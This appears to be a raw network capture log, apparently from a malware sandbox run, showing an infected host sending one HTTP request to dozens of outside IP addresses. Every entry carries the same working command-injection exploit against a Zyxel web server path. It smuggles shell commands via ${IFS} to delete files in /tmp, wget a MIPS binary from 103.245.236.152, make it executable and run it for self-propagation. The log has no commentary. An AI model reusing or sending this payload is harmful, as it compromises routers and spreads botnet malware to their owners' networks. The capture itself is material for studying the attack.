                                        Jan 14, 2024 16:19:01.854137897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8981192.168.2.1350226110.164.204.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854204893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8982192.168.2.1345152103.201.166.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854255915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8983192.168.2.133575623.191.165.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854312897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8984192.168.2.1340702108.84.46.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854373932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8985192.168.2.135387699.131.96.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854409933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8986192.168.2.1346238123.103.206.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854468107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8987192.168.2.135003034.172.134.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854502916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8988192.168.2.1357608152.60.127.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854547024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8989192.168.2.1334276147.199.147.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854612112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8990192.168.2.1342276133.108.121.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854676962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8991192.168.2.1346536132.87.46.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854720116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8992192.168.2.1347464110.2.40.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854774952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8993192.168.2.1334510104.105.143.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854830980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8994192.168.2.133534054.194.1.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854887962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8995192.168.2.134961651.70.233.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.854943037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8996192.168.2.134150069.149.81.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855004072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8997192.168.2.134341270.89.6.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855067968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8998192.168.2.134191483.92.121.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855133057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8999192.168.2.1360758103.108.175.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855187893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9000192.168.2.1356818184.202.253.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855230093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9001192.168.2.1354732202.24.19.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855273962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9002192.168.2.1354544125.242.6.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855350018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9003192.168.2.133279877.194.53.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855418921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9004192.168.2.135125050.201.91.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855472088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9005192.168.2.1338222196.9.43.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855509043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9006192.168.2.135801049.202.126.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855567932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9007192.168.2.134765294.88.134.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855623960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9008192.168.2.135333042.246.77.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855691910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9009192.168.2.1350328149.156.146.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855762005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9010192.168.2.1353810213.47.62.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855803967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9011192.168.2.1345022134.14.0.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855880976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9012192.168.2.135555414.196.205.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855928898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9013192.168.2.1345306217.104.40.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.855962992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9014192.168.2.1360204222.18.191.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856031895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9015192.168.2.135288461.58.211.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856084108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9016192.168.2.135129839.222.99.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856118917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9017192.168.2.1352894176.172.212.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856170893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9018192.168.2.134961071.111.208.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856215954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9019192.168.2.1342946170.132.184.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856242895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9020192.168.2.135678689.130.117.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856319904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9021192.168.2.133493084.120.137.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856372118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9022192.168.2.1342574194.202.100.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856422901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9023192.168.2.134495064.104.170.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856478930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9024192.168.2.134980081.137.206.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856519938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9025192.168.2.1345716187.53.157.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856570959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9026192.168.2.135565412.233.27.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856650114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9027192.168.2.1338162114.221.198.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856713057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9028192.168.2.134253032.11.7.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856789112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9029192.168.2.1342338119.242.33.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856868029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9030192.168.2.1341020157.151.158.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856913090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9031192.168.2.13506745.239.26.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.856996059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9032192.168.2.1360032210.205.238.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857036114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9033192.168.2.1336900161.87.243.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857075930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9034192.168.2.1348332208.216.146.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857099056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9035192.168.2.1352358188.43.41.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857163906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9036192.168.2.135363865.12.12.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857208967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9037192.168.2.134852490.153.36.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857275009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9038192.168.2.1360702133.151.168.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857342005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9039192.168.2.1353280186.100.76.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857398033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9040192.168.2.1360584158.61.78.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857456923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9041192.168.2.1360548198.149.195.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857508898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9042192.168.2.1338182167.155.164.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857557058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9043192.168.2.134017492.97.13.204443
                                        TimestampBytes transferredDirectionData
